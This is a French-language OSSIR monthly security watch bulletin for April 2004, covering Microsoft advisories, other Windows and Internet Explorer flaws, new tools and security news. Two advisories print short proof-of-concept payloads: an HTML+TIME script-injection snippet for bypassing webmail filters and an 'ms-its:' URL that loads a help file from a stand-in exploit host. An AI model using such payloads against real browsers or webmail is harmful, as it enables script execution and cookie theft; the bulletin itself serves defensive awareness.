OSSIR

 

Sécurité des systèmes Windows

Base OSWIN v2

Site expérimental

Dernières mises à jour

Ressources
XP SP2
Guides de sécurité
Outils

Avis de sécurité Windows

Accès à l'ancienne base

Site officiel de l'OSSIR

Forum (N/D)

Contact

Rechercher sur ce site :


The Web OSWIN

Site réalisé, maintenu et hébergé par EdelWeb

Veille OSSIR pour le mois de Avril 2004

Date de création : -
Dernière modification : -

1. Avis Microsoft
2. Autres avis
3. Nouveaux outils
4. Autres infos

Les faits marquants ce mois ci :

  • Le Journées Microsoft Sécurité les 4, 5, 6 mai prochain
  • La JSSI le mois prochain
  • Guerre entre les auteurs des virus Netsky / Bagle / Mydoom
  • Premiers virus utilisant des archives ZIP protégées par mot de passe

Avis Microsoft

 

Alerte MS04-008 Bogue dans le serveur Media Services
Référence Qualys + Microsoft / Avril 2004
Affecte Windows 2000 Server (SP2, SP3, SP4) avec Media Services installé
Type de problème Vulnérabilité dans le filtre ISAPI "nsiislog.dll".
Exploitation

Déni de service.
Possibilité d'exploitation inconnue.
Avis de l'OSSIR

Les (rares) utilisateurs de Media Services devraient installer le patch.

 

Alerte MS04-009 Exécution de scripts en zone poste de travail via le tag "mailto:"
Référence iDefense + Microsoft / Avril 2004
Affecte Outlook XP SP2
Problème corrigé dans le SP3
Type de problème Détails techniques sur
http://www.idefense.com/application/poi/display?id=79&type=vulnerabilities
Exploitation

Exécution de scripts en zone poste de travail (donc sans restriction).

Pas de code d'exploitation publié à notre connaissance mais vulnérabilité "critique" car exploitable via un simple mail.
Avis de l'OSSIR

Tous les utilisateurs des produits Office devraient installer les derniers Service Packs (ici le SP3).

 

Alerte MS04-010 Fuite d'information via Messenger
Référence Chercheurs indépendants + Microsoft / Avril 2004
Affecte Messenger 6.0 et 6.1
Type de problème Lecture possible de n'importe quel fichier du disque dur par un utilisateur distant.
Exploitation

Pas de code d'exploitation publié à notre connaissance.
Avis de l'OSSIR

Messenger devrait être désactivé en entreprise, sinon installer le patch.

 

Autres avis

 

Alerte Exécution de scripts non filtrés par Yahoo et Hotmail
Référence http://www.greymagic.com/security/advisories/gm005-mc/
Avril 2004
Affecte Internet Explorer
Type de problème Exécution de scripts via une méthode inconnue des principaux Webmails via la fonction "HTML + TIME", ce qui permet entre autres de voler le cookie d'authentification de l'utilisateur logué.
Exploitation

<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time" />
<?import namespace="t" implementation="#default#time2">
Optional text here ...
<div>
<t:set attributeName="innerHTML" to="&lt;script defer&gt;alert()&lt;/script&gt;A" />
</div>
Avis de l'OSSIR

La guerre entre les filtres et les méthodes de contournement est sans fin.

 

Alerte Variante du bogue IE "MS-ITS:"
Référence Newsgroup public
Avril 2004
Affecte Internet Explorer 6 SP1 sur Windows XP (autres non testés)
Type de problème Exécution de scripts en zone poste de travail via un fichier d'aide
Exploitation

(Concaténer tous les éléments suivants sur une seule ligne)

ms-its:
http:\\www.exploit.com\exploit.chm::\exploit.htm
Avis de l'OSSIR

Compte tenu du nombre de variantes de ce bogue, désactiver le support du protocole "MS-ITS:".

La faille initiale avait été exploitée par le ver Ibiza.

 

Nouveaux outils
  • MyDoom / DoomJuice Cleaner
http://www.microsoft.com/downloads/details.aspx?familyid=c14bfbe4-3d50-464d-a26c-9c287f8a08c5&displaylang=en
  • Recensement de parc logiciel

http://www.microsoft.com/france/logicieloriginal/gerer/telechargement.mspx

  • Kit sécurité gratuit

Hotfixes (jusqu'à octobre 2003) + Firewall Personnel + Antivirus (F-Secure pour la France)
Délai 28 jours
http://www.microsoft.com/france/securite/protection/cdrom.asp

  • Le "centre de déploiement" des postes de travail

Ressources sur Windows XP et Office
http://www.microsoft.com/france/technet/themes/postedetravail/default.mspx

  • Outil "LimitLogin" en Beta test

Limite le nombre de sessions concurrentes sur un domaine Windows 2003
Inclus dans le futur Resource Kit pour Windows 2003
https://beta.microsoft.com/ (ID : LLOGIN)

  • SUS 2.0 s'appelle officiellement WUS (Windows Update Services)

Beta disponible depuis le 16 mars

 

Autres infos

 

  • Microsoft fait la promotion du Haut Débit

Un pré-requis à NGSCB ?
http://www.microsoft.com/france/internet/ressources/dossiers/haut-debit/default.asp

  • Participation de Microsoft à la Virus Information Alliance

http://www.microsoft.com/technet/security/topics/virus/via.mspx

  • Encore des comparatifs Windows / Linux …

http://www.microsoft.com/france/lesfaits/mousquetaires.asp

  • Compte-rendu de l'intervention de Bill Gates à RSA Conf.

http://www.microsoft.com/billgates/speeches/2004/02-24rsa.asp

  • Journées Microsoft Sécurité les 4, 5, 6 mai

http://www.microsoft.com/france/securite/conference/default.asp

  • La "guerre des virus"

Bagle : "Hey, NetSky, fuck off you bitch, don't ruine our bussiness, wanna start a war?"

Mydoom : "Netsky is shitty app"

Netsky.F : "Skynet AntiVirus - Bagle - you are a looser!!!!"

Netsky.K : "Nous voulons détruire les activités des auteurs de programmes malveillants, en particulier Mydoom et Bagle. À F-Secure et aux autres [éditeurs de logiciels antivirus], nous ne voulons pas endommager les ordinateurs... Nous respectons votre travail (votre balayage heuristique n'est pas au point! Améliorez-le). Ceci est la dernière version de notre antivirus. Le code source sera publié sous peu."

Références
http://www.branchez-vous.com/actu/04-03/08-172102.html
http://www.branchez-vous.com/actu/04-03/08-173502.html

  • Nouveaux virus utilisant des archives avec mot de passe, parfois sous forme d'image !

Au départ les antivirus recherchaient le mot de passe dans le message. Maintenant Kaspersky détecte les ZIP avec mot de passe comme virus "générique" !

  • Impact des virus sur l'activité économique

22% des PME (< 20p.) européennes ont du fermer au moins une journée pour nettoyer les virus.
En tête des entreprises les plus touchées : France (50%), Italie (30%).

  • Décision de justice européenne concernant Microsoft (24 mars 2004)

5 ans d'enquête, Microsoft condamné en première instance à 497,2 millions d'euros d'amende (record européen).
Autres points du jugement :
- Windows Media Player ne devra pas être préinstallé
- Amélioration de l'interopérabilité des interfaces dans les 120 jours
Critiques américaines suite à cette décision.

  • Grosses activité autour du cassage de mots de passe

RainbowCrack 1.2
Algos : LM, NTLM, MD2, MD4, MD5, SHA-1, RIPEMD-160
http://www.antsight.com/zsl/rainbowcrack/

Charset "complet" (Rainbow Table de 118 Go)
Cracking on-line : 10$ / mois
http://www.whitehat.co.il/news.php

Charset étendu # L0phtCrack (Rainbow Table de 18 Go)
Cracking on-line : gratuit
http://sarcaprj.wayreth.eu.org/

  • Article sur la sécurité de IIS 6.0

http://www.securityfocus.com/infocus/1765

  • Une liste non officielle des bogues .NET

http://www.jelovic.com/dotnetbugs/

  • "Googling" sur les documents Word en mode révision

http://lcamtuf.coredump.cx/strikeout/

  • Ouverture de "Open Source Vulnerability Database"

http://www.osvdb.org/

  • Affaire ViGuard vs. Guillermito

Affaire à suivre ...